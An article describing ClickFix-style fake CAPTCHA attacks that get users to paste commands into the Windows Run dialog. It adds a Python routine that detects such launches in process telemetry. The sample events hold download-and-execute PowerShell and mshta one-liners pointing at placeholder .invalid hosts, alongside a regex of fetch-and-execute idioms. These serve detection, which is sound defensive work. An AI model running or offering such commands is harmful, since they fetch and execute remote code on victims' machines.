The attack begins with legitimate websites that have been compromised and seeded with malicious JavaScript. When users visit or interact with these sites, the script redirects them to deceptive pages that display a fake error message or a fake CAPTCHA verification, urging them to "fix" the problem by copying a command from the page and pasting it into their system's terminal or PowerShell.
“When a victim visits a malicious or compromised site, they see a message ‘Checking if the site connection is secure - Verify you are human’ just as they would on a real Cloudflare page,” Kelley said in a blog post. A pop-up or on-page message then walks the user through a short sequence of key presses: Win+R to open the Windows Run dialog, Ctrl+V to paste the command the page has staged, and Enter to run it. The user, not the browser, launches the interpreter, so the malware executes on the machine without any exploit and without a file download the user would recognise as such.
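Because the victim launches the payload from the Run dialog, the resulting interpreter process is a child of explorer.exe, and its command line carries the download-and-execute idiom that was pasted in. The following detection routine is an added example written for this article, not code from Kelley's blog post or from any vendor; it scans constructed process-creation events (JSON lines in the shape of Sysmon Event ID 1 fields, with made-up hostnames under the reserved `.invalid` domain) and flags only events that show both signals: a shell interpreter spawned directly by explorer.exe and a command line containing a remote-fetch-and-execute pattern. The field names, sample events and indicator list are assumptions chosen for illustration.

```python
"""Flag the Win+R -> Ctrl+V -> Enter execution pattern in process-creation telemetry.

Added example for the ClickFix-style attack described above; constructed data only.
"""
import json
import re

# Interpreters that a pasted Run-dialog command typically resolves to.
SHELL_IMAGES = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
}

# Command-line idioms that fetch and run remote content. Illustrative list, not exhaustive.
SUSPICIOUS_CMDLINE = re.compile(
    r"\b(?:iex|irm|iwr|invoke-expression|invoke-webrequest|invoke-restmethod|downloadstring)\b"
    r"|mshta\s+https?://"
    r"|-w(?:indowstyle)?\s+hidden"
    r"|-e(?:nc|ncodedcommand)\s+\S{20,}",
    re.IGNORECASE,
)

# Constructed sample telemetry (Sysmon Event ID 1 style fields, JSON lines).
# Hostnames use the reserved .invalid TLD; nothing here is taken from a real incident.
SAMPLE_EVENTS = r'''
{"UtcTime": "2025-01-15 10:02:11", "Image": "C:\\Windows\\explorer.exe", "ParentImage": "C:\\Windows\\System32\\userinit.exe", "CommandLine": "C:\\Windows\\Explorer.EXE"}
{"UtcTime": "2025-01-15 10:03:40", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -c \"iex (irm https://verify.example.invalid/captcha)\""}
{"UtcTime": "2025-01-15 10:05:02", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -NoExit -Command Get-Date"}
{"UtcTime": "2025-01-15 10:06:30", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "powershell -ExecutionPolicy Bypass -c \"iex ((New-Object Net.WebClient).DownloadString('https://intranet.example.invalid/deploy.ps1'))\""}
{"UtcTime": "2025-01-15 10:09:15", "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta https://cdn.example.invalid/check.hta"}
'''


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> list:
    """Return the list of reasons an event looks like a pasted Run-dialog payload."""
    reasons = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")

    # Signal 1: the Run dialog is hosted by explorer.exe, so anything launched from it
    # appears as a direct child of explorer.exe. Interactive shells do this too, which
    # is why this signal alone is not enough (see the Get-Date event in the sample).
    if image in SHELL_IMAGES and parent == "explorer.exe":
        reasons.append("shell interpreter spawned directly by explorer.exe (Run dialog)")

    # Signal 2: the pasted one-liner fetches and executes remote content. Admin tooling
    # uses the same idioms, but usually from a service or scheduler parent, not explorer.
    if SUSPICIOUS_CMDLINE.search(cmdline):
        reasons.append("command line contains a remote fetch-and-execute idiom")
    return reasons


def find_clickfix_candidates(jsonl: str) -> list:
    """Parse JSON-lines telemetry and return events that show both signals."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reasons = score_event(event)
        if len(reasons) == 2:  # require both signals to keep false positives down
            hits.append({**event, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(hit["UtcTime"], basename(hit["Image"]), "<-", basename(hit["ParentImage"]))
        print("   ", hit["CommandLine"])
        for reason in hit["reasons"]:
            print("    -", reason)
```

On the constructed sample this flags the two Run-dialog launches (the hidden PowerShell download-and-execute and the remote .hta) and leaves the interactive Get-Date shell and the deployment script started by services.exe alone. For incident response on a suspected host, the same pasted command is also recoverable from the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth checking alongside process telemetry.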
“The concept of phishing users with fake security controls is not a new one,” said James Maude, field CTO at BeyondTrust. “In the past, threat actors have had great success with phishing documents that trick users into allowing malicious macros to run using fake security checks that claim the document needs macros enabled for security.”
